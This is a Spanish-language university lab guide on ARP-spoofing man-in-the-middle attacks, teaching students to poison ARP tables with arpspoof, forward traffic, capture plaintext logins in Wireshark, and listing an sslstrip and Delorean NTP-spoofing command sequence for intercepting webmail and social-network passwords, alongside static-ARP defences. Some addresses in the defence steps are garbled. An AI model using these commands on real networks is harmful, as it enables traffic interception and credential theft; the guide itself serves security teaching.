UNIVERSIDAD AUTÓNOMA DE OCCIDENTE

FACULTAD DE INGENIERÍA
ESPECIALIZACIÓN EN SEGURIDAD INFORMÁTICA
GUÍA DE LABORATORIO Ataque y Protección Man in the Middle

Asignatura: Seguridad en Datos

Docente: Julio César Gómez Castaño

Objetivos:

 Comprender como funciona la comunicación LAN y el Modelo OSI con este ataque y
protección
 Entender el funcionamiento del ataque Man in the Middle
 Utilizar la herramienta arpsoofing para entender funcionamiento de man in the middle
 Comprender lo vulnerable que es al capa 2 del modelo OSI
 Como se protege de este tipo de ataque

INTRODUCCIÓN

En este laboratorio se explica el ARP y como realizar, entender y protegerse del ataque man in
the middle

NOTA: ES LABORATORIO ES ÚNICAMENTE EDUCATIVO PARA COMPRENDER EL ATAQUE

Y COMO SE PUEDE PROTEGER LOS EQUIPOS, REALICE ESTOS SOBRE SUS PROPIOS
EQUIPOS Y CUENTAS, SI LO REALIZA SOBRE OTROS EQUIPOS ES UN DELITO Y PUEDE IR
A CARCEL Y NO ES MI RESPONSABILIDAD. LO QUE SI DEBE REALIZAR ES PROTEGER
SUS EQUIPOS PARA QUE NO LE HAN ESTE TIPO DE ATAQUE

Recursos:

Computador con conexión a Internet y el wireshark

Computador con Ubuntu con el paquete dsniff y el Wireshark con conexión a la Red

ACTIVIDADES

A. Fundamentación Teórica
B. Estableciendo Ambiente del laboratorio
C. Realizando el ataque el hombre en la mitad
D. Protegiendo los equipos Windows y Linux de ese tipo de ataque
E. PREGUNTAS
F. CONCLUCIONES

A FUNDAMENTACIÓN

Man in the middle (Hombre en la mitad)

Este tipo de ataque consiste un poder interceptar la comunicación entre dos equipos,
ubicándose en la mitad de ellos, Engañando a cada una de las partes, haciendo pasar por
el otro, como ocurrió en la Operación Jaque Mate donde liberaron a Ingrid Betancourt, a
los tres norteamericanos y 11 policias y soldados colombianos.

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 1
Este tipo de ataque ocurre porque en la capa 2 del modelo OSI, no hay autenticación y el
protocolo arp es muy vulnerable.

El protocolo arp es el que relaciona las direcciones físicas (MAC) y las direcciones lógicas
(IP), es importante entender cómo funciona bien este protocolo para comprender este
ataque.Para Interceptar la comunicación entre equipos se utilizar el arp spoofing, que es
el envenenamiento de la tabla arp.

ARP Spoofing: suplantación de identidad por falsificación de la tabla ARP. Se trata de la

construcción de tramas de solicitud y respuesta ARP modificadas con el objetivo de
envenenar la tabla ARP (relación de las direcciones IP-MAC) de una víctima y forzarla a
que envíe los paquetes a un equipo atacante, en lugar de hacerlo a su destino legítimo.
Explicándolo de una manera más sencilla: El protocolo Ethernet trabaja mediante
direcciones MAC, no mediante direcciones IP. ARP es el protocolo encargado de traducir
direcciones IP a direcciones MAC para que la comunicación pueda establecerse; para ello
cuando un host quiere comunicarse con una IP emite una trama ARP-Request a la
dirección de Broadcast, pidiendo la MAC del host poseedor la IP con la que quiere
comunicarse. El computador con la IP solicitada responde con un ARP-Reply indicando su
MAC, En la figura 1 en las trama 5 está el ARP-Request de la consulta que envía el
equipo con dirección IP 192.168.1.63. y en la trama 6 está el ARP-Reply. Los Switches y
los Computadores guardan una tabla local con la relación direcciones IP-MAC llamada
"tabla ARP". Dicha tabla ARP puede ser falseada por un computador atacante que emita
tramas ARP-REPLY indicando su MAC como destino válido para una IP específica, como
por ejemplo la de un router, de esta manera la información dirigida al router pasaría por el
computador atacante quien podrá escuchar dicha información y redirigirla, si así lo desea.

Figura 1 ARP averiguando la dirección MAC

El protocolo ARP trabaja a nivel de la capa de enlace de datos de modelo OSI, por lo que
esta técnica sólo puede ser utilizada en el segmento de red o vlan. Una manera de
protegerse de esta técnica es mediante entradas tablas ARP estáticas (siempre que las
ips de red sean fijas), lo cual puede ser difícil en redes grandes. Para adicionar una
entrada estática en la tabla ARP estática se tendría que ejecutar el comando:

 arp -s [IP] [MAC]

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 2
  Por ejemplo: arp -s 192.168.1.254 58-23-8c-7d-6d-cf

Funcionamiento de ARP:

Supongan que se tiene una pequeña red y se quiere realizar un ssh a la computadora de
uno de ellos que tiene de host el nombre "venus". Antes que nada nuestro cliente ssh
(putty) va a convertir el nombre venus en una dirección IP de 32 bits, Una vez que
tenemos la dirección IP del host venus, el cliente ssh, le va a decir al TCP que se
encargue de establecer una conexión con esa dirección de IP; aquí el TCP va a enviar un
datagrama IP solicitando una conexión al host venus. En este ejemplo se trabaja con la
red local 192.168.1.0/24, por lo cual el datagrama IP puede ir directamente hacia ese
host, pero en el caso de que quisiera realizar un ssh a un host en una red remota nuestro
datagrama IP se enruta directamente hacia la salida predeterminada de la
red(192.168.1.254), como por ejemplo un router y de ahí seguiría hasta el próximo salto
hasta llegar a destino. Como se sabe en una LAN se debe identificar con la dirección de
hardware (dirección MAC), por lo que ARP va a asociar la dirección IP de 32 bits en la
dirección de hardware de 48 bits. Luego ARP va a enviar un pedido o lo que se llama un
"ARP request" al broadcast, es decir, a cada host conectado en la red, en el ARP request
va incluido la dirección IP del host venus y lo que hace es preguntar "si es dueño de esta
dirección IP, responda un mensaje unicast con la dirección de hardware". El host venus va
a recibir este broadcast con el ARP request preguntando por él y le va a contestar, esta
respuesta se llama "ARP reply" y por supuesto que en ella va incluida su dirección de
hardware. Una vez que se recibe el ARP reply con la dirección de hardware finalmente se
puede realizar de envió del datagrama IP al host venus para establecer la conexión. Y
todo esto gracias a ARP Para hacer más eficiente el trabajo de resolver cual es la
dirección de hardware de un host cada vez que se la necesita averiguar, existe el ARP
Cache. Cada vez que algún host resuelve una dirección de hardware de otro host, todos
los demás guardan una copia en el cache para después no tener que volver a hacer ese
mismo trabajo. Cada dirección de hardware que entra al ARP Cache es guardada por un
minuto (según el Sistema Operativo), luego de ello se borra y si se la necesita la tiene que
volver a pedir, a menos que ya otro host la haya pedido por lo cual vuelve a ingresar al
cache. En Linux el comando "arp" sirve para manipular el arp cache del sistema. Si
quiere ver el cache actual, se digita el siguiente comando:

root@venus:~# arp -a
router (192.168.1.254) at 58:23:8c:7d:6d:cf
pcjulio (192.168.1.63) at 00:25:ab:90:c6:e9

La opción "arp -a" muestra todas las entradas que hay en nuestro cache, como
vemos primero aparece el host, luego la dirección IP y luego la dirección de
hardware. Tenemos otras opciones del comando arp que también nos pueden ser
muy útiles, por ejemplo la opción "arp -d" que nos permite borrar cualquier entrada
del cache pero esto solo puede ser hecho por el root.

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 3
Para mostrar el funcionamiento de ARPSPOOF nos ubicaremos en la escena que
se muestra en la figura siguiente en donde el atacante suplantará la identidad del
Gateway y de la víctima con el objetivo de que los paquetes de datos que envíe y
reciba la víctima pasen antes por la máquina del atacante.

B. ESTABLECIENDO AMBIENTE DEL LABORATORIO

Este laboratorio se realice en mi casa, con la red cableada, en mi computador

Lenovo tengo Microsoft Windows 10 y con Ubuntu 20.04 en máquina Virtual y la
tarjeta de Red en modo puente.

Figura 2 Topología de la Red

C REALIZANDO EL ATAQUE EL HOMBRE EN LA MITAD

1. Con base en la Red donde se va a realizar las pruebas y con base a la topología de la red
(Figura 1), completar la siguiente información del direccionamiento IP y de las direcciones MAC
de sus equipos y llenar la tabla. La dirección IP en Microsoft la consulta con el comando
ipconfig /all y en GNU Linux con ifconfig.

Dirección IP Puerta de Enlace: MAC:

Dirección IP Víctima: MAC:
Dirección IP del Atacante (Ubuntu): MAC:

En este laboratorio se van a mostrar los ejemplos con base al direccionamiento de la figura 1

Dirección IP Puerta de Enlace (router): 192.168.1.254 MAC: 58-23-8c-7d-ed-cf

Dirección IP Víctima (pcjulio): 192.168.1.63 MAC: 00-25-ab-90-c6-e9
Dirección IP del Atacante (Ubuntu): 192.168.1.61 MAC: 08-00-84-7a-89-d8

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 4
2. Prueba conectividad de los equipos y la conexión a Internet. Borre las tablas ARP del equipo
víctima (en Windows arp –d y debe ser usuario administrador), con ayuda del wireshark y
realizando ping entre ellos, explique el proceso para que un equipo averigüe las direcciones
MAC. Muestre evidencias.

En la figura 3 está la tabla ARP del computador víctima con la interfaz Ethernet, el 0xC significa
que esa interfaz es la 12 (C esta en hexadecimal y pasando a decimal da 12)

Figura 3 Topología de la Red

3. Instalar el paquete dsniff en Ubuntu, en Kali Linux ya está instalado, con el siguiente comando
se instala en Ubuntu

root@venus:~# apt-get install dsniff

4. Realizar el proceso de ataque del hombre en la mitad

a. En el equipo víctima realizar un ping continuo a un equipo en Internet, en Microsoft
con el siguiente comando en el cmd ( ping -t 8.8.8.8 )

b. Envenenar la tabla ARP de la víctima (192.168.1.63) desde el atacante,

informando que la dirección MAC de la puerta del enlace (192.168.1.254) es la
dirección MAC atacante, la cual se realiza con el siguiente comando ( arpspoof –t
dir_ip_victima dir_ip_para_suplantar_mac)

root@venus:~# arpspoof -t 192.168.1.63 192.168.1.254

Este envenenamiento es continuo, el atacante le envía tramas de ARP-Reply con

la dirección MAC falsa, por eso se debe dejar el proceso en ejecución. Si se
cancela el comando, se finaliza la suplantación. (Fig. 4)

Figura 4 Envenenando la tabla ARP de la víctima

En la victima se puede apreciar que no le sigue funcionando la conexión a Internet

y no puede navegar, hasta este punto se logró una Denegación del Servicio (DoS).
Como se aprecia en la figura 5.

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 5
 Figura 5 Denegación del servicio

Realizar en el equipo de la víctima un ping al equipo del atacante ( ping

192.168.1.61), para que en la tabla ARP de la víctima este entrada del atacante y
si se visualiza la tabla ARP, se observa que la tabla esta suplantada la dirección
MAC de la puerta de enlace, con la dirección MAC del atacante (Figura 6).

Figura 6 Tabla ARP suplantada

c. Para poder interceptar la comunicación y la victima tenga conexión a Internet, es

necesario convertir al equipo atacante en router, para que pueda recibir paquetes y
los pueda transmitir al siguiente equipo, lo cual se realiza con el siguiente comando
en el atacante, que lo que hace es colocar el número 1 en ese archivo, el símbolo
> re direcciona la salida y sobrescribe el valor que tenga.

root@venus:~# echo 1 > /proc/sys/net/ipv4/ip_forward

d. Hasta este punto se ha realizado la mitad del ataque al hombre en la mitad, es

decir, que solo interceptamos los mensajes que envía la víctima al router, en este
caso hacia Internet, para realizar la interceptación completa, se debe también
envenenar la tabla ARP del router (192.168.1.254) desde el atacante, informando
que la dirección MAC de la víctima (192.168.1.63) es la dirección MAC del
atacante, la cual se realiza con el siguiente comando ( arpspoof –t dir_ip_victima
dir_ip_para_suplantar_mac)

root@venus:~# arpspoof -t 192.168.1.254 192.168.1.63

En la Figura 7 se aprecia el comando y la información que envía el atacante al

router, suplantando la MAC de la víctima con la dirección MAC del atacante.

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 6
 Figura 7 Envenenando la tabla ARP del router

e. Como otra prueba del ataque en el hombre en la mitad, la víctima va a ingresar a

una página con protocolo http (no está cifrada) que tenga autenticación por
ejemplo http://sitios.manizales.unal.edu.co/diracademica/suma/index.php?m=1,
pero antes en el equipo del atacante se ejecuta el wireshark, con el siguiente
comando (root@venus:~# wireshark &) y se captura tráfico sobre la interface
(Ethernet o Wireless) que se está trabajando. Sino tiene instalado el programas
sniffer, lo puede instalar con el siguiente comando (root@venus:~# apt install
wireshark). Después de que este capturando el tráfico, en el equipo de la víctima
ingresar a la página web sin cifrado, con login y contraseña cualquiera. En la
Figura 8 se observa que se está ingresando con el usuario:juliocesar y la
contraseña no se visualiza, muestra 9 asteriscos.

Figura 8 Ingresando a página web sin cifrado

Después de dar clic en Enviar y que le sale error de autenticación, detener la

captura de tráfico en el Wireshark (Seleccione Capture/Stop) en la máquina del
atacante. A continuación se busca la trama con el usuario y la contraseña, para lo
cual se realiza el siguiente proceso en el wireshark: Selecciona Edit/Find Packet,
después seleccionamos String, se escribe el nombre del usuario en mi caso

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 7
 juliocesar, seleccione Packet Details y se da clic en el botón Find, como esta en
la figura 9 y se debe ver la trama (2406) donde está la víctima enviando (POST) el
usuario y la contraseña. Adicionar a su informe la evidencia que le funcionó la
captura con sus datos.

Figura 9 captura de contraseña con el ataque

f. Detener los dos procesos de ataques pulsando Ctrl C en cada ventana del
arpspoofing.

D. PROTEGIENDO LOS EQUIPOS WINDOWS Y LINUX DE ESE TIPO DE ATAQUE

1. Protegiendo a Equipos en Microsoft Windows

a. Protegiendo a equipos Microsoft Windows de este ataque, para ello se debe

ingresar una entrada estática en la tabla ARP con la información correcta, ya que
si hay una entrada estática, no se deja modificar, a no ser que borren la entrada.
Para adicionar esa entrada en Microsoft Windows, se debe realizar como
administrador del sistema, se necesita la dirección IP del router (192.168.1.254),
la dirección MAC del router (58-23-8c-7d-6d-cd) y el número de la interfaz de red,
Para averiguar ese número se utiliza el comando netstat -r que muestra la lista de
interfaces, en mi caso es la interfaz 12 ya que estoy realizando el laboratorio con la

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 8
 tarjeta de red cableada Realtek.(Fig 10), otra forma de averiguarlo es con el
comando arp como esta en la figura 6.

Figura 10 Consultando la lista de interfaces

Ya con esos datos se puede ingresar la entrada estática en la tabla arp utilizando
el comando netsh como administrador, con las siguientes opciones como esta en
la figura 11, netsh, escribir el comando interface, para mirar las lista de
interfaces, puede ejecutar el comando show interfaces, y se corrobora que en mi
caso es la interface 12 (Ethernet) y adicionamos la entrada con el comando add
neighbors 12 192.168.168.10.254 58-23-8c-7d-6d-cd, donde el 12 representa el
número de la interfaz, la dirección IP del router y la dirección MAC del router, y por
último se sale (exit)

Figura 11 Entrada estático a la tabla arp con netsh

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 9
 Para verificar que sí quedo bien se consulta la tabla con el comando arp –a y
donde está la información de nuestra interface, debe aparecer la información
correcta y de tipo estático como esta en la figura 12

Figura 12 Consulta la tabla dirección MAC y quede estática la entrada

b. Trate de realizar el ataque nuevamente y verifique que no funciona utilizando el

wireshark, incluya evidencias

2. Protegiendo un equipo GNU/Linux (Ubuntu)

a. Se utiliza el comando arp –s dirección IP y la dirección MAC como se aprecia en

la figura 13 y que al consultar la tabla, la entrada quede permanente.

Figura 13 Ingresando la entrada estático con netsh

b. Pruebe que el equipo Linux está protegido

PREGUNTAS

1. Con la ayuda del sniffer explique ¿qué tramas está enviando el atacante a las víctimas y
que pasa en su tabla arp?, muestre evidencias.

2. Como puede proteger mi dispositivo móvil de este ataque

3. Realizar la siguiente prueba de ataque para interceptar la contraseña de Hotmail y

Facebook cifrada, solo como prueba y adicionar evidencias, lo cual se hizo en el 2018 con
base en el video (fuente Captura trafico SSL con SSLSTRIP Delorean ARPSPOOF)
realizando el ataque Man in the middle y prueba que con ellos puede detectar las
contraseñas Gmail; a continuación están los comandos para ayuda y los debe
explicar, parte de cual lo hacen en el video.

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 10
 Ayuda Comandos del ataque del video

Direcciones del IP
kali atacante es 192.168.1.2
Víctima 192.168.1.7 Windows

nmap -sn 192.168.1.0/24

service ssh restart

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -L
iptables -L -t nat

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080

iptables -t nat -A PREROUTING -p udp --dport 123 -j REDIRECT --to-port 123

cd /
mkdir ntpserver
cd ntpserver
git clone https://github.com/PentesterES/Delorean.git

cd Delorean
./delorean.py --help

./delorean.py --force-date= '2040-02-02'

cd /usr/share/sslstrip
./sslstrip.py -k -l 8080

en otra ventana
cd /usr/share/ssltrip
tail -f sslstrip.log

La víctima tiene facebook yahoo y outlook

arpspoof -i eth0 -t 192.168.1.7 192.168.1.1

Minuto 13:28 cambia el ntp por uno de windows y lo coloca en 2021

4. Buscar si hay videos o manuales más actualizados del punto anterior y realizar la prueba

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 11
.

5. ¿Qué son los sistemas anti-sniffer y anti-spoofing?

6. ¿Qué es DHCP Snooping, Port Security, Dynamic ARP Inspection, MACSec, ACLs
Hardware-based de capa 2?

7. Escribir tres conclusiones

Bibliografía

Operación Jaque Mate donde liberaron a Ingrid Betancourt, a los tres norteamericanos y
11 policias y soldados colombianos.

Captura trafico SSL con SSLSTRIP Delorean ARPSPOOF

Laboratorio Ataque y Protección Man in the Middle

Ing. Julio César Gómez jcgomezc@uao.edu.co jgomez@umanizales.edu.co / mar 2020 - 12